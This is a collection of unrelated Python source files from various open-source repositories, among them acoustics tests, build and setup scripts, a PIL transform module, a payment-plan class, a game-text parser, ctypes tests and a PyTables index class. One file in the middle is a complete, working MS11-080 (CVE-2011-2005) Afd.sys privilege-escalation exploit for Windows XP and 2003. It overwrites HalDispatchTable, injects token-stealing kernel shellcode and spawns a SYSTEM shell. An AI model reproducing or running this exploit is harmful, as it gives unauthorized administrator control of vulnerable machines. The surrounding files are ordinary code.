assert(dbmean([10.0, 10.0]) == 10.0)
def test_dbadd():
assert(abs(dbadd(10.0, 10.0) - 13.0103) < 1e-5)
def test_dbsub():
assert(abs(dbsub(13.0103, 10.0) - 10.0) < 1e-5)
def test_dbmul():
assert(abs(dbmul(10.0, 2) - 13.0103) < 1e-5)
def test_dbdiv():
assert(abs(dbdiv(13.0103, 2) - 10.0) < 1e-5) | FRidh/python-acoustics | tests/test_decibel.py | Python | bsd-3-clause | 451 | 0.019956 |
#!/usr/bin/env python
# vim:fileencoding=UTF-8:ts=4:sw=4:sta:et:sts=4:ai
from __future__ import with_statement
__license__ = 'GPL v3'
__copyright__ = '2009, Kovid Goyal <kovid@kovidgoyal.net>'
__docformat__ = 'restructuredtext en'
import os, shutil, subprocess, glob
from setup import Command, __appname__, __version__
class Stage1(Command):
description = 'Stage 1 of the publish process'
sub_commands = [
'check',
'pot',
'build',
'resources',
'translations',
'iso639',
'gui',
]
class Stage2(Command):
description = 'Stage 2 of the publish process'
sub_commands = ['linux', 'win', 'osx']
def pre_sub_commands(self, opts):
for x in glob.glob(os.path.join(self.d(self.SRC), 'dist', '*')):
os.remove(x)
build = os.path.join(self.d(self.SRC), 'build')
if os.path.exists(build):
shutil.rmtree(build)
class Stage3(Command):
description = 'Stage 3 of the publish process'
sub_commands = ['upload_user_manual', 'upload_demo', 'sdist', 'tag_release']
class Stage4(Command):
description = 'Stage 4 of the publish process'
sub_commands = ['upload_installers']
class Stage5(Command):
description = 'Stage 5 of the publish process'
sub_commands = ['upload_to_server']
def run(self, opts):
subprocess.check_call('rm -rf build/* dist/*', shell=True)
class Publish(Command):
description = 'Publish a new calibre release'
sub_commands = ['stage1', 'stage2', 'stage3', 'stage4', 'stage5', ]
class Manual(Command):
description='''Build the User Manual '''
def run(self, opts):
cwd = os.path.abspath(os.getcwd())
os.chdir(os.path.join(self.SRC, '..', 'manual'))
try:
for d in ('.build', 'cli'):
if os.path.exists(d):
shutil.rmtree(d)
os.makedirs(d)
if not os.path.exists('.build'+os.sep+'html'):
os.makedirs('.build'+os.sep+'html')
os.environ['__appname__'] = __appname__
os.environ['__version__'] = __version__
subprocess.check_call(['sphinx-build', '-b', 'html', '-t', 'online',
'-d', '.build/doctrees', '.', '.build/html'])
subprocess.check_call(['sphinx-build', '-b', 'myepub', '-d',
'.build/doctrees', '.', '.build/epub'])
subprocess.check_call(['sphinx-build', '-b', 'mylatex', '-d',
'.build/doctrees', '.', '.build/latex'])
pwd = os.getcwdu()
os.chdir('.build/latex')
subprocess.check_call(['make', 'all-pdf'], stdout=open(os.devnull,
'wb'))
os.chdir(pwd)
epub_dest = self.j('.build', 'html', 'calibre.epub')
pdf_dest = self.j('.build', 'html', 'calibre.pdf')
shutil.copyfile(self.j('.build', 'epub', 'calibre.epub'), epub_dest)
shutil.copyfile(self.j('.build', 'latex', 'calibre.pdf'), pdf_dest)
subprocess.check_call(['ebook-convert', epub_dest,
epub_dest.rpartition('.')[0] + '.azw3',
'--page-breaks-before=/', '--disable-font-rescaling',
'--chapter=/'])
finally:
os.chdir(cwd)
def clean(self):
path = os.path.join(self.SRC, 'calibre', 'manual', '.build')
if os.path.exists(path):
shutil.rmtree(path)
class TagRelease(Command):
description = 'Tag a new release in bzr'
def run(self, opts):
self.info('Tagging release')
subprocess.check_call(('bzr tag '+__version__).split())
subprocess.check_call('bzr commit --unchanged -m'.split() + ['IGN:Tag release'])
| yeyanchao/calibre | setup/publish.py | Python | gpl-3.0 | 3,819 | 0.008117 |
################################################################################
######### MS11-080 - CVE-2011-2005 Afd.sys Privilege Escalation Exploit ########
######### Author: ryujin@offsec.com - Matteo Memelli ########
######### Spaghetti & Pwnsauce ########
######### yuck! 0xbaadf00d Elwood@mac&cheese.com ########
######### ########
######### Thx to dookie(lifesaver)2000ca, dijital1 and ronin ########
######### for helping out! ########
######### ########
######### To my Master Shifu muts: ########
######### "So that's it, I just need inner peace?" ;) ########
######### ########
######### Exploit tested on the following 32bits systems: ########
######### Win XPSP3 Eng, Win 2K3SP2 Standard/Enterprise Eng ########
################################################################################
from ctypes import (windll, CDLL, Structure, byref, sizeof, POINTER,
c_char, c_short, c_ushort, c_int, c_uint, c_ulong,
c_void_p, c_long, c_char_p)
from ctypes.wintypes import HANDLE, DWORD
import socket, time, os, struct, sys
from optparse import OptionParser
usage = "%prog -O TARGET_OS"
parser = OptionParser(usage=usage)
parser.add_option("-O", "--target-os", type="string",
action="store", dest="target_os",
help="Target OS. Accepted values: XP, 2K3")
(options, args) = parser.parse_args()
OS = options.target_os
if not OS or OS.upper() not in ['XP','2K3']:
parser.print_help()
sys.exit()
OS = OS.upper()
kernel32 = windll.kernel32
ntdll = windll.ntdll
Psapi = windll.Psapi
def findSysBase(drvname=None):
ARRAY_SIZE = 1024
myarray = c_ulong * ARRAY_SIZE
lpImageBase = myarray()
cb = c_int(1024)
lpcbNeeded = c_long()
drivername_size = c_long()
drivername_size.value = 48
Psapi.EnumDeviceDrivers(byref(lpImageBase), cb, byref(lpcbNeeded))
for baseaddy in lpImageBase:
drivername = c_char_p("\x00"*drivername_size.value)
if baseaddy:
Psapi.GetDeviceDriverBaseNameA(baseaddy, drivername,
drivername_size.value)
if drvname:
if drivername.value.lower() == drvname:
print "[+] Retrieving %s info..." % drvname
print "[+] %s base address: %s" % (drvname, hex(baseaddy))
return baseaddy
else:
if drivername.value.lower().find("krnl") !=-1:
print "[+] Retrieving Kernel info..."
print "[+] Kernel version:", drivername.value
print "[+] Kernel base address: %s" % hex(baseaddy)
return (baseaddy, drivername.value)
return None
print "[>] MS11-080 Privilege Escalation Exploit"
print "[>] Matteo Memelli - ryujin@offsec.com"
print "[>] Release Date 28/11/2011"
WSAGetLastError = windll.Ws2_32.WSAGetLastError
WSAGetLastError.argtypes = ()
WSAGetLastError.restype = c_int
SOCKET = c_int
WSASocket = windll.Ws2_32.WSASocketA
WSASocket.argtypes = (c_int, c_int, c_int, c_void_p, c_uint, DWORD)
WSASocket.restype = SOCKET
closesocket = windll.Ws2_32.closesocket
closesocket.argtypes = (SOCKET,)
closesocket.restype = c_int
connect = windll.Ws2_32.connect
connect.argtypes = (SOCKET, c_void_p, c_int)
connect.restype = c_int
class sockaddr_in(Structure):
_fields_ = [
("sin_family", c_short),
("sin_port", c_ushort),
("sin_addr", c_ulong),
("sin_zero", c_char * 8),
]
## Create our deviceiocontrol socket handle
client = WSASocket(socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_TCP,
None, 0, 0)
if client == ~0:
raise OSError, "WSASocket: %s" % (WSAGetLastError(),)
try:
addr = sockaddr_in()
addr.sin_family = socket.AF_INET
addr.sin_port = socket.htons(4455)
addr.sin_addr = socket.htonl(0x7f000001) # 127.0.0.1
## We need to connect to a closed port, socket state must be CONNECTING
connect(client, byref(addr), sizeof(addr))
except:
closesocket(client)
raise
baseadd = c_int(0x1001)
MEMRES = (0x1000 | 0x2000)
PAGEEXE = 0x00000040
Zerobits = c_int(0)
RegionSize = c_int(0x1000)
written = c_int(0)
## This will trigger the path to AfdRestartJoin
irpstuff = ("\x41\x41\x41\x41\x42\x42\x42\x42"
"\x00\x00\x00\x00\x44\x44\x44\x44"
"\x01\x00\x00\x00"
"\xe8\x00" + "4" + "\xf0\x00" + "\x45"*231)
## Allocate space for the input buffer
dwStatus = ntdll.NtAllocateVirtualMemory(-1,
byref(baseadd),
0x0,
byref(RegionSize),
MEMRES,
PAGEEXE)
# Copy input buffer to it
kernel32.WriteProcessMemory(-1, 0x1000, irpstuff, 0x100, byref(written))
startPage = c_int(0x00020000)
kernel32.VirtualProtect(startPage, 0x1000, PAGEEXE, byref(written))
################################# KERNEL INFO ##################################
lpDriver = c_char_p()
lpPath = c_char_p()
lpDrvAddress = c_long()
(krnlbase, kernelver) = findSysBase()
hKernel = kernel32.LoadLibraryExA(kernelver, 0, 1)
HalDispatchTable = kernel32.GetProcAddress(hKernel, "HalDispatchTable")
HalDispatchTable -= hKernel
HalDispatchTable += krnlbase
print "[+] HalDispatchTable address:", hex(HalDispatchTable)
halbase = findSysBase("hal.dll")
## WinXP SP3
if OS == "XP":
HaliQuerySystemInformation = halbase+0x16bba # Offset for XPSP3
HalpSetSystemInformation = halbase+0x19436 # Offset for XPSP3
## Win2k3 SP2
else:
HaliQuerySystemInformation = halbase+0x1fa1e # Offset for WIN2K3
HalpSetSystemInformation = halbase+0x21c60 # Offset for WIN2K3
print "[+] HaliQuerySystemInformation address:", hex(HaliQuerySystemInformation)
print "[+] HalpSetSystemInformation address:", hex(HalpSetSystemInformation)
################################# EXPLOITATION #################################
shellcode_address_dep = 0x0002071e
shellcode_address_nodep = 0x000207b8
padding = "\x90"*2
HalDispatchTable0x4 = HalDispatchTable + 0x4
HalDispatchTable0x8 = HalDispatchTable + 0x8
## tokenbkaddr = 0x00020900
if OS == "XP":
_KPROCESS = "\x44"
_TOKEN = "\xc8"
_UPID = "\x84"
_APLINKS = "\x88"
else:
_KPROCESS = "\x38"
_TOKEN = "\xd8"
_UPID = "\x94"
_APLINKS = "\x98"
restore_ptrs = "\x31\xc0" + \
"\xb8" + struct.pack("L", HalpSetSystemInformation) + \
"\xa3" + struct.pack("L", HalDispatchTable0x8) + \
"\xb8" + struct.pack("L", HaliQuerySystemInformation) + \
"\xa3" + struct.pack("L", HalDispatchTable0x4)
tokenstealing = "\x52" +\
"\x53" +\
"\x33\xc0" +\
"\x64\x8b\x80\x24\x01\x00\x00" +\
"\x8b\x40" + _KPROCESS +\
"\x8b\xc8" +\
"\x8b\x98" + _TOKEN + "\x00\x00\x00" +\
"\x89\x1d\x00\x09\x02\x00" +\
"\x8b\x80" + _APLINKS + "\x00\x00\x00" +\
"\x81\xe8" + _APLINKS + "\x00\x00\x00" +\
"\x81\xb8" + _UPID + "\x00\x00\x00\x04\x00\x00\x00" +\
"\x75\xe8" +\
"\x8b\x90" + _TOKEN + "\x00\x00\x00" +\
"\x8b\xc1" +\
"\x89\x90" + _TOKEN + "\x00\x00\x00" +\
"\x5b" +\
"\x5a" +\
"\xc2\x10"
restore_token = "\x52" +\
"\x33\xc0" +\
"\x64\x8b\x80\x24\x01\x00\x00" +\
"\x8b\x40" + _KPROCESS +\
"\x8b\x15\x00\x09\x02\x00" +\
"\x89\x90" + _TOKEN + "\x00\x00\x00" +\
"\x5a" +\
"\xc2\x10"
shellcode = padding + restore_ptrs + tokenstealing
shellcode_size = len(shellcode)
orig_size = shellcode_size
# Write shellcode in userspace (dep)
kernel32.WriteProcessMemory(-1, shellcode_address_dep, shellcode,
shellcode_size, byref(written))
# Write shellcode in userspace *(nodep)
kernel32.WriteProcessMemory(-1, shellcode_address_nodep, shellcode,
shellcode_size, byref(written))
## Trigger Pointer Overwrite
print "[*] Triggering AFDJoinLeaf pointer overwrite..."
IOCTL = 0x000120bb # AFDJoinLeaf
inputbuffer = 0x1004
inputbuffer_size = 0x108
outputbuffer_size = 0x0 # Bypass Probe for Write
outputbuffer = HalDispatchTable0x4 + 0x1 # HalDispatchTable+0x4+1
IoStatusBlock = c_ulong()
NTSTATUS = ntdll.ZwDeviceIoControlFile(client,
None,
None,
None,
byref(IoStatusBlock),
IOCTL,
inputbuffer,
inputbuffer_size,
outputbuffer,
outputbuffer_size
)
## Trigger shellcode
inp = c_ulong()
out = c_ulong()
inp = 0x1337
hola = ntdll.NtQueryIntervalProfile(inp, byref(out))
## Spawn a system shell, w00t!
print "[*] Spawning a SYSTEM shell..."
os.system("cmd.exe /T:C0 /K cd c:\\windows\\system32")
############################## POST EXPLOITATION ###############################
print "[*] Restoring token..."
## Restore the thingie
shellcode = padding + restore_ptrs + restore_token
shellcode_size = len(shellcode)
trail_padding = (orig_size - shellcode_size) * "\x00"
shellcode += trail_padding
shellcode_size += (orig_size - shellcode_size)
## Write restore shellcode in userspace (dep)
kernel32.WriteProcessMemory(-1, shellcode_address_dep, shellcode,
shellcode_size, byref(written))
## Write restore shellcode in userspace (nodep)
kernel32.WriteProcessMemory(-1, shellcode_address_nodep, shellcode,
shellcode_size, byref(written))
## Overwrite HalDispatchTable once again
NTSTATUS = ntdll.ZwDeviceIoControlFile(client,
None,
None,
None,
byref(IoStatusBlock),
IOCTL,
inputbuffer,
inputbuffer_size,
outputbuffer,
outputbuffer_size
)
## Trigger restore shellcode
hola = ntdll.NtQueryIntervalProfile(inp, byref(out))
print "[+] Restore done! Have a nice day :)"
| SecWiki/windows-kernel-exploits | MS11-080/CVE-2011-2005.py | Python | mit | 12,217 | 0.014161 |
from setuptools import setup
setup(name='powerlab',
version='0.1',
description='Power System Tools',
url='https://github.com/Faggioni/powerlab',
author='Miguel Faggioni',
author_email='miguelfaggioni@gmail.com',
license='MIT',
packages=['powerlab'],
install_requires=[
'numpy',
],
entry_points= {
},
zip_safe=False) | Faggioni/powerlab | setup.py | Python | mit | 405 | 0.004938 |
from setuptools import setup, find_packages # Always prefer setuptools over distutils
from os import path
here = path.abspath(path.dirname(__file__))
setup(
name='dicom2fem',
description='Generation of finite element meshes from DICOM images',
long_desctioption="Generation of finite element meshes using computed " +
"tomography scans. Segmentation is based on the graph cut algorithm.",
# Versions should comply with PEP440. For a discussion on single-sourcing
# the version across setup.py and the project code, see
# http://packaging.python.org/en/latest/tutorial.html#version
version='1.1.13',
url='https://github.com/vlukes/dicom2fem',
author='Vladimir Lukes',
author_email='vlukes@kme.zcu.cz',
license='MIT',
# See https://pypi.python.org/pypi?%3Aaction=list_classifiers
classifiers=[
# How mature is this project? Common values are
# 3 - Alpha
# 4 - Beta
# 5 - Production/Stable
'Development Status :: 3 - Alpha',
# Indicate who your project is intended for
'Intended Audience :: Developers',
'Topic :: Scientific/Engineering :: Bio-Informatics',
# Pick your license as you wish (should match "license" above)
'License :: OSI Approved :: BSD License',
# Specify the Python versions you support here. In particular, ensure
# that you indicate whether you support Python 2, Python 3 or both.
# 'Programming Language :: Python :: 2',
# 'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
# 'Programming Language :: Python :: 3',
# 'Programming Language :: Python :: 3.2',
# 'Programming Language :: Python :: 3.3',
# 'Programming Language :: Python :: 3.4',
],
# What does your project relate to?
keywords='fem dicom',
# You can just specify the packages manually here if your project is
# simple. Or you can use find_packages().
packages=find_packages(exclude=['dist', 'docs', 'tests*']),
# List run-time dependencies here. These will be installed by pip when your
# project is installed. For an analysis of "install_requires" vs pip's
# requirements files see:
# https://packaging.python.org/en/latest/technical.html#install-requires-vs-requirements-files
install_requires=[
# 'numpy', 'imcut'
],
# dependency_links=['https://github.com/mjirik/gco_python'],
# If there are data files included in your packages that need to be
# installed, specify them here. If using Python 2.6 or less, then these
# have to be included in MANIFEST.in as well.
# package_data={
# 'sample': ['package_data.dat'],
# },
# Although 'package_data' is the preferred approach, in some case you may
# need to place data files outside of your packages.
# see http://docs.python.org/3.4/distutils/setupscript.html#installing-additional-files
# In this case, 'data_file' will be installed into '<sys.prefix>/my_data'
# data_files=[('my_data', ['data/data_file'])],
# To provide executable scripts, use entry points in preference to the
# "scripts" keyword. Entry points provide cross-platform support and allow
# pip to create the appropriate form of executable for the target platform.
# entry_points={
# 'console_scripts': [
# 'sample=sample:main',
# ],
# },
)
| mjirik/dicom2fem | setup.py | Python | bsd-3-clause | 3,561 | 0.000842 |
#
# The Python Imaging Library.
# $Id$
#
# transform wrappers
#
# History:
# 2002-04-08 fl Created
#
# Copyright (c) 2002 by Secret Labs AB
# Copyright (c) 2002 by Fredrik Lundh
#
# See the README file for information on usage and redistribution.
#
from PIL import Image
class Transform(Image.ImageTransformHandler):
def __init__(self, data):
self.data = data
def getdata(self):
return self.method, self.data
def transform(self, size, image, **options):
# can be overridden
method, data = self.getdata()
return image.transform(size, method, data, **options)
class AffineTransform(Transform):
"""
Define an affine image transform.
This function takes a 6-tuple (a, b, c, d, e, f) which contain the first
two rows from an affine transform matrix. For each pixel (x, y) in the
output image, the new value is taken from a position (a x + b y + c,
d x + e y + f) in the input image, rounded to nearest pixel.
This function can be used to scale, translate, rotate, and shear the
original image.
@def AffineTransform(matrix)
@param matrix A 6-tuple (a, b, c, d, e, f) containing the first two rows
from an affine transform matrix.
@see Image#Image.transform
"""
method = Image.AFFINE
class ExtentTransform(Transform):
"""
Define a transform to extract a subregion from an image.
Maps a rectangle (defined by two corners) from the image to a rectangle of
the given size. The resulting image will contain data sampled from between
the corners, such that (x0, y0) in the input image will end up at (0,0) in
the output image, and (x1, y1) at size.
This method can be used to crop, stretch, shrink, or mirror an arbitrary
rectangle in the current image. It is slightly slower than crop, but about
as fast as a corresponding resize operation.
@def ExtentTransform(bbox)
@param bbox A 4-tuple (x0, y0, x1, y1) which specifies two points in the
input image's coordinate system.
@see Image#Image.transform
"""
method = Image.EXTENT
class QuadTransform(Transform):
"""
Define a quad image transform.
Maps a quadrilateral (a region defined by four corners) from the image to a
rectangle of the given size.
@def QuadTransform(xy)
@param xy An 8-tuple (x0, y0, x1, y1, x2, y2, y3, y3) which contain the
upper left, lower left, lower right, and upper right corner of the
source quadrilateral.
@see Image#Image.transform
"""
method = Image.QUAD
class MeshTransform(Transform):
"""
Define a mesh image transform. A mesh transform consists of one or more
individual quad transforms.
@def MeshTransform(data)
@param data A list of (bbox, quad) tuples.
@see Image#Image.transform
"""
method = Image.MESH
# End of file
| DanteOnline/free-art | venv/lib/python3.4/site-packages/PIL/ImageTransform.py | Python | gpl-3.0 | 2,878 | 0 |
'''
plans.py
'''
from forex_python.converter import CurrencyCodes
from .base import Base
class Plan(Base):
'''
Plan class for making payment plans
'''
interval = None
name = None
amount = None
plan_code = None
currency = None
id = None
send_sms = True
send_invoices = True
description = None
__interval_values = ('hourly', 'daily', 'weekly', 'monthly', 'annually')
def __init__(self, name, interval, amount, currency='NGN', plan_code=None,
id=None, send_sms=None, send_invoices=None, description=None):
super().__init__()
#Check if currency supplied is valid
if not CurrencyCodes().get_symbol(currency.upper()):
raise ValueError("Invalid currency supplied")
if interval.lower() not in self.__interval_values:
raise ValueError("Interval should be one of 'hourly',"
"'daily', 'weekly', 'monthly','annually'"
)
try:
amount = int(amount)
except ValueError:
raise ValueError("Invalid amount")
else:
self.interval = interval.lower()
self.name = name
self.interval = interval
self.amount = amount
self.currency = currency
self.plan_code = plan_code
self.id = id
self.send_sms = send_sms
self.send_invoices = send_invoices
self.description = description
def __str__(self):
return "%s plan" % self.name
| Chibuzor-IN/python-paystack | python_paystack/objects/plans.py | Python | mit | 1,566 | 0.001916 |
#!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "PhotoLoader.settings")
from django.core.management import execute_from_command_line
execute_from_command_line(sys.argv)
| SerSamgy/PhotoLoader | manage.py | Python | mit | 254 | 0 |
#!/usr/bin/env python
import argparse
import logging
from functools import partial
from domain import date, transaction
# Parse command line arguments
parser = argparse.ArgumentParser(description="Convert currency using MasterCard exchange rates",
epilog='If no date is specified, the most recent date with rates is used.')
parser.add_argument('from_quantity', type=float, help='Quantity of from_currency used in transaction')
parser.add_argument('from_currency', type=str.upper,
help='The currency to convert from, i.e. the transaction currency, e.g. GBP, USD, JPY')
parser.add_argument('to_currency', type=str.upper,
help='The currency to convert to, i.e. the card currency, e.g. GBP, USD, JPY')
parser.add_argument('-d', '--date',
help='Day the exchange was made in format YYYY-MM-DD. Only today and yesterday appear to be supported by MasterCard. Defaults to most recent day with rates.')
parser.add_argument('--log_level', help='Set logging level', default='WARNING',
type=str.upper,
choices=['CRITICAL', 'ERROR', 'WARNING', 'INFO', 'DEBUG'])
parser.add_argument('-t', '--today', action='store_true',
help='Use today\'s exchange rates. This may error if today\'s rates have not been uploaded')
parser.add_argument('-y', '--yesterday', action='count', default=0,
help='Uses yesterday\'s exchange rates. Repeat to go further back in time')
args = parser.parse_args()
logging.basicConfig(level=logging.getLevelName(args.log_level))
logging.debug(args)
# Figure out which date to use
if args.date is not None: # User-specified date
settle = partial(transaction.settle, exchange_rate_date=date.parse(args.date))
elif args.today: # Today
settle = partial(transaction.settle, exchange_rate_date=date.date_today())
elif args.yesterday > 0: # Yesterday (note that yesterday can be specified multiple times)
settle = partial(transaction.settle, exchange_rate_date=date.date_n_days_ago(args.yesterday))
else: # Use most recent date with published rates, discover date from initial MasterCard call
settle = transaction.settle_latest
# Get card amount from MasterCard
transaction = settle(
transaction_amount=args.from_quantity,
transaction_currency=args.from_currency,
card_currency=args.to_currency,
)
# Output conversion
print(transaction['card_amount'])
| XanderXAJ/mastercardConvert | mastercardConvert.py | Python | gpl-3.0 | 2,462 | 0.004874 |
# DPLib - Asynchronous bot framework for Digital Paint: Paintball 2 servers
# Copyright (C) 2017 Michał Rokita
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
A module for parsing DP data
"""
CHAR_TAB = ['\0', '-', '-', '-', '_', '*', 't', '.', 'N', '-', '\n', '#', '.', '>', '*', '*',
'[', ']', '@', '@', '@', '@', '@', '@', '<', '>', '.', '-', '*', '-', '-', '-',
' ', '!', '\"', '#', '$', '%', '&', '\'', '(', ')', '*', '+', ',', '-', '.', '/',
'0', '1', '2', '3', '4', '5', '6', '7', '8', '9', ':', ';', '<', '=', '>', '?',
'@', 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O',
'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z', '[', '\\', ']', '^', '_',
'`', 'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o',
'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z', '{', '|', '}', '~', '<',
'(', '=', ')', '^', '!', 'O', 'U', 'I', 'C', 'C', 'R', '#', '?', '>', '*', '*',
'[', ']', '@', '@', '@', '@', '@', '@', '<', '>', '*', 'X', '*', '-', '-', '-',
' ', '!', '\"', '#', '$', '%', '&', '\'', '(', ')', '*', '+', ',', '-', '.', '/',
'0', '1', '2', '3', '4', '5', '6', '7', '8', '9', ':', ';', '<', '=', '>', '?',
'@', 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O',
'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z', '[', '\\', ']', '^', '_',
'`', 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O',
'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z', '{', '|', '}', '~', '<']
def decode_ingame_text(text):
"""
Removes special chars from ingame messages/nicks
:param text: Text to decode
:return: Decoded text
"""
cleaned_text = ""
skip_next = False
for i in text:
char_ascii = ord(i)
# 134-underline, 135-italic, 136-color
if char_ascii == 134 or char_ascii == 135 or char_ascii == 136 or skip_next: # Remove underline, italic symbols
if char_ascii == 136:
skip_next = True
else:
skip_next = False
else:
cleaned_text = cleaned_text + CHAR_TAB[char_ascii]
skip_next = False
return cleaned_text
def render_text(text):
"""
Renders some text with formatting to a DP message.
Replaces {C} with color char (ASCII 136), {U} with underline (ASCII 134) and {I} with italic (ASCII 135)
:param text: Text to render
:type text: str
:return: DP message
:rtype: str
"""
return text.format(C=chr(136), U=chr(134), I=chr(135))
def escape_braces(string):
"""
Escapes braces, use for user-input in :func:`render_text`
:param string: string to escape
:return: escaped string
"""
return string.replace('{', '{{').replace('}', '}}')
| mRokita/DPLib | dplib/parse.py | Python | agpl-3.0 | 3,545 | 0.005079 |
import unittest
from ctypes import *
import _ctypes_test
class SlicesTestCase(unittest.TestCase):
def test_getslice_cint(self):
a = (c_int * 100)(*xrange(1100, 1200))
b = range(1100, 1200)
self.failUnlessEqual(a[0:2], b[0:2])
self.failUnlessEqual(len(a), len(b))
self.failUnlessEqual(a[5:7], b[5:7])
self.failUnlessEqual(a[-1], b[-1])
self.failUnlessEqual(a[:], b[:])
a[0:5] = range(5, 10)
self.failUnlessEqual(a[0:5], range(5, 10))
def test_setslice_cint(self):
a = (c_int * 100)(*xrange(1100, 1200))
b = range(1100, 1200)
a[32:47] = range(32, 47)
self.failUnlessEqual(a[32:47], range(32, 47))
from operator import setslice
# TypeError: int expected instead of str instance
self.assertRaises(TypeError, setslice, a, 0, 5, "abcde")
# TypeError: int expected instead of str instance
self.assertRaises(TypeError, setslice, a, 0, 5, ["a", "b", "c", "d", "e"])
# TypeError: int expected instead of float instance
self.assertRaises(TypeError, setslice, a, 0, 5, [1, 2, 3, 4, 3.14])
# ValueError: Can only assign sequence of same size
self.assertRaises(ValueError, setslice, a, 0, 5, range(32))
def test_char_ptr(self):
s = "abcdefghijklmnopqrstuvwxyz"
dll = CDLL(_ctypes_test.__file__)
dll.my_strdup.restype = POINTER(c_char)
dll.my_free.restype = None
res = dll.my_strdup(s)
self.failUnlessEqual(res[:len(s)], s)
import operator
self.assertRaises(TypeError, operator.setslice,
res, 0, 5, u"abcde")
dll.my_free(res)
dll.my_strdup.restype = POINTER(c_byte)
res = dll.my_strdup(s)
self.failUnlessEqual(res[:len(s)], range(ord("a"), ord("z")+1))
dll.my_free(res)
def test_char_ptr_with_free(self):
dll = CDLL(_ctypes_test.__file__)
s = "abcdefghijklmnopqrstuvwxyz"
class allocated_c_char_p(c_char_p):
pass
dll.my_free.restype = None
def errcheck(result, func, args):
retval = result.value
dll.my_free(result)
return retval
dll.my_strdup.restype = allocated_c_char_p
dll.my_strdup.errcheck = errcheck
try:
res = dll.my_strdup(s)
self.failUnlessEqual(res, s)
finally:
del dll.my_strdup.errcheck
def test_char_array(self):
s = "abcdefghijklmnopqrstuvwxyz\0"
p = (c_char * 27)(*s)
self.failUnlessEqual(p[:], s)
try:
c_wchar
except NameError:
pass
else:
def test_wchar_ptr(self):
s = u"abcdefghijklmnopqrstuvwxyz\0"
dll = CDLL(_ctypes_test.__file__)
dll.my_wcsdup.restype = POINTER(c_wchar)
dll.my_wcsdup.argtypes = POINTER(c_wchar),
dll.my_free.restype = None
res = dll.my_wcsdup(s)
self.failUnlessEqual(res[:len(s)], s)
import operator
self.assertRaises(TypeError, operator.setslice,
res, 0, 5, u"abcde")
dll.my_free(res)
if sizeof(c_wchar) == sizeof(c_short):
dll.my_wcsdup.restype = POINTER(c_short)
elif sizeof(c_wchar) == sizeof(c_int):
dll.my_wcsdup.restype = POINTER(c_int)
elif sizeof(c_wchar) == sizeof(c_long):
dll.my_wcsdup.restype = POINTER(c_long)
else:
return
res = dll.my_wcsdup(s)
self.failUnlessEqual(res[:len(s)-1], range(ord("a"), ord("z")+1))
dll.my_free(res)
################################################################
if __name__ == "__main__":
unittest.main()
| ztane/zsos | userland/lib/python2.5/ctypes/test/test_slicing.py | Python | gpl-3.0 | 3,845 | 0.00156 |
"""Here is defined the IndexArray class."""
from bisect import bisect_left, bisect_right
from .node import NotLoggedMixin
from .carray import CArray
from .earray import EArray
from . import indexesextension
# Declarations for inheriting
class CacheArray(indexesextension.CacheArray, NotLoggedMixin, EArray):
"""Container for keeping index caches of 1st and 2nd level."""
# Class identifier.
_c_classid = 'CACHEARRAY'
class LastRowArray(indexesextension.LastRowArray, NotLoggedMixin, CArray):
"""Container for keeping sorted and indices values of last row of an
index."""
# Class identifier.
_c_classid = 'LASTROWARRAY'
class IndexArray(indexesextension.IndexArray, NotLoggedMixin, EArray):
"""Represent the index (sorted or reverse index) dataset in HDF5 file.
All NumPy typecodes are supported except for complex datatypes.
Parameters
----------
parentnode
The Index class from which this object will hang off.
.. versionchanged:: 3.0
Renamed from *parentNode* to *parentnode*.
name : str
The name of this node in its parent group.
atom
An Atom object representing the shape and type of the atomic objects to
be saved. Only scalar atoms are supported.
title
Sets a TITLE attribute on the array entity.
filters : Filters
An instance of the Filters class that provides information about the
desired I/O filters to be applied during the life of this object.
byteorder
The byteroder of the data on-disk.
"""
# Class identifier.
_c_classid = 'INDEXARRAY'
@property
def chunksize(self):
"""The chunksize for this object."""
return self.chunkshape[1]
@property
def slicesize(self):
"""The slicesize for this object."""
return self.shape[1]
def __init__(self, parentnode, name,
atom=None, title="",
filters=None, byteorder=None):
"""Create an IndexArray instance."""
self._v_pathname = parentnode._g_join(name)
if atom is not None:
# The shape and chunkshape needs to be fixed here
if name == "sorted":
reduction = parentnode.reduction
shape = (0, parentnode.slicesize // reduction)
chunkshape = (1, parentnode.chunksize // reduction)
else:
shape = (0, parentnode.slicesize)
chunkshape = (1, parentnode.chunksize)
else:
# The shape and chunkshape will be read from disk later on
shape = None
chunkshape = None
super().__init__(
parentnode, name, atom, shape, title, filters,
chunkshape=chunkshape, byteorder=byteorder)
# This version of searchBin uses both ranges (1st level) and
# bounds (2nd level) caches. It uses a cache for boundary rows,
# but not for 'sorted' rows (this is only supported for the
# 'optimized' types).
def _search_bin(self, nrow, item):
item1, item2 = item
result1 = -1
result2 = -1
hi = self.shape[1]
ranges = self._v_parent.rvcache
boundscache = self.boundscache
# First, look at the beginning of the slice
begin = ranges[nrow, 0]
# Look for items at the beginning of sorted slices
if item1 <= begin:
result1 = 0
if item2 < begin:
result2 = 0
if result1 >= 0 and result2 >= 0:
return (result1, result2)
# Then, look for items at the end of the sorted slice
end = ranges[nrow, 1]
if result1 < 0:
if item1 > end:
